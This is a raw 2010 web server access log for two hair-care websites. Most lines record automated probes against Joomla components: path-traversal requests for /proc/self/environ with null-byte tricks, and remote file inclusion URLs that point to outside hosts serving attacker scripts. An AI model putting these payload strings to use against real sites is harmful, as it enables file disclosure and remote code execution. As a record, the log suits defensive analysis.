209.9.231.100 - - [12/Jul/2010:19:29:42 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:29:42 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:29:42 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:29:53 -0700] "GET /logs/access_100628.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:30:45 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
67.201.60.20 - - [12/Jul/2010:19:30:46 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
67.201.60.20 - - [12/Jul/2010:19:30:46 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:19:30:48 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:31:27 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.191.5 - - [12/Jul/2010:19:31:27 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.191.5 - - [12/Jul/2010:19:31:27 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.191.5 - - [12/Jul/2010:19:32:46 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.191.5 - - [12/Jul/2010:19:32:46 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.191.5 - - [12/Jul/2010:19:32:46 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:34:10 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
67.201.60.20 - - [12/Jul/2010:19:34:31 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
67.201.60.20 - - [12/Jul/2010:19:34:31 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
67.201.60.20 - - [12/Jul/2010:19:34:31 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
81.93.240.134 - - [12/Jul/2010:19:36:11 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.134 - - [12/Jul/2010:19:36:11 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.134 - - [12/Jul/2010:19:36:11 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.134 - - [12/Jul/2010:19:37:36 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.134 - - [12/Jul/2010:19:37:36 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.134 - - [12/Jul/2010:19:37:36 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
62.44.82.118 - - [12/Jul/2010:19:37:53 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
67.201.60.20 - - [12/Jul/2010:19:40:21 -0700] "GET /logs/access_100405.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
62.44.82.118 - - [12/Jul/2010:19:41:20 -0700] "GET /logs/access.log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.118 - - [12/Jul/2010:19:41:21 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.118 - - [12/Jul/2010:19:41:21 -0700] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:41:26 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:41:26 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:41:26 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
81.93.240.134 - - [12/Jul/2010:19:45:56 -0700] "GET /logs/access_100405.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:48:20 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:48:20 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:48:20 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:19:53:25 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
67.228.235.93 - - [12/Jul/2010:19:55:57 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:19:56:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:19:56:52 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:00:22 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:00:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:01:30 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:20:01:31 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
62.44.82.118 - - [12/Jul/2010:20:02:00 -0700] "GET /logs/access_100614.log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
67.205.67.73 - - [12/Jul/2010:20:03:48 -0700] "GET /index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.205.67.73 - - [12/Jul/2010:20:03:48 -0700] "GET /logs/access.log%20%20/index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.205.67.73 - - [12/Jul/2010:20:03:48 -0700] "GET /logs/index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.205.67.73 - - [12/Jul/2010:20:03:49 -0700] "GET /index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.205.67.73 - - [12/Jul/2010:20:03:49 -0700] "GET /logs/access.log%20%20/index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.205.67.73 - - [12/Jul/2010:20:03:49 -0700] "GET /logs/index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.205.67.73 - - [12/Jul/2010:20:04:27 -0700] "GET /logs/index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:20:04:27 -0700] "GET /index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:20:04:27 -0700] "GET /logs/access_100628.log%20%20/index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:20:04:30 -0700] "GET /logs/index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:20:04:30 -0700] "GET /logs/access_100628.log%20%20/index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:20:04:30 -0700] "GET /index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:20:04:36 -0700] "GET /logs/access_100705.log%20%20/index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.67.73 - - [12/Jul/2010:20:04:40 -0700] "GET /logs/access_100705.log%20%20/index.php?option=com_gcalendar&controller=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.141.56.49 - - [12/Jul/2010:20:06:53 -0700] "GET /logs/index1.php?page=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.141.56.49 - - [12/Jul/2010:20:06:53 -0700] "GET /logs/access_100426.log/index1.php?page=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.141.56.49 - - [12/Jul/2010:20:06:53 -0700] "GET /index1.php?page=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.141.56.49 - - [12/Jul/2010:20:06:55 -0700] "GET /logs/access_100426.log/index1.php?page=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.141.56.49 - - [12/Jul/2010:20:06:55 -0700] "GET /logs/index1.php?page=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.141.56.49 - - [12/Jul/2010:20:06:55 -0700] "GET /index1.php?page=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.160.123.150 - - [12/Jul/2010:20:11:27 -0700] "GET /main.php?sayfa=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.160.123.150 - - [12/Jul/2010:20:11:27 -0700] "GET /logs//main.php?sayfa=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.160.123.150 - - [12/Jul/2010:20:11:27 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:20:12:04 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:20:12:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:20:12:05 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:14:02 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:14:03 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:14:04 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:14:04 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:14:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:14:05 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:20:14:57 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.228.235.93 - - [12/Jul/2010:20:14:57 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.228.235.93 - - [12/Jul/2010:20:14:57 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:20:17:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
67.228.235.93 - - [12/Jul/2010:20:17:37 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:18:19 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:20:18:20 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:20:18:20 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:20:18:21 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:20:18:21 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:20:18:22 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:20:21:57 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:20:21:58 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:20:23:38 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "growlonghairfast.com"
66.249.65.197 - - [12/Jul/2010:20:23:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15132 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
66.249.65.212 - - [12/Jul/2010:20:24:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12478 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
66.249.65.212 - - [12/Jul/2010:20:27:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13477 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
93.160.123.150 - - [12/Jul/2010:20:27:39 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.160.123.150 - - [12/Jul/2010:20:27:39 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.160.123.150 - - [12/Jul/2010:20:27:39 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:20:30:10 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:20:30:10 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:20:30:11 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
66.249.65.197 - - [12/Jul/2010:20:30:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14346 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:20:31:09 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:20:31:09 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:20:31:10 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:20:40:17 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:42:42 -0700] "GET /logs/access_100222.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:42:43 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:42:43 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:42:47 -0700] "GET /logs/access_100222.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:42:47 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:42:48 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:43:16 -0700] "GET /logs/access_100208.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:43:20 -0700] "GET /logs/access_100208.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:44:29 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:44:29 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:45:14 -0700] "GET /logs/access_100222.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:45:14 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:45:15 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:45:28 -0700] "GET /logs/access_100222.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:45:28 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:45:28 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
84.255.193.115 - - [12/Jul/2010:20:45:34 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:45:35 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:45:39 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:45:39 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:49:12 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
84.255.193.115 - - [12/Jul/2010:20:49:12 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
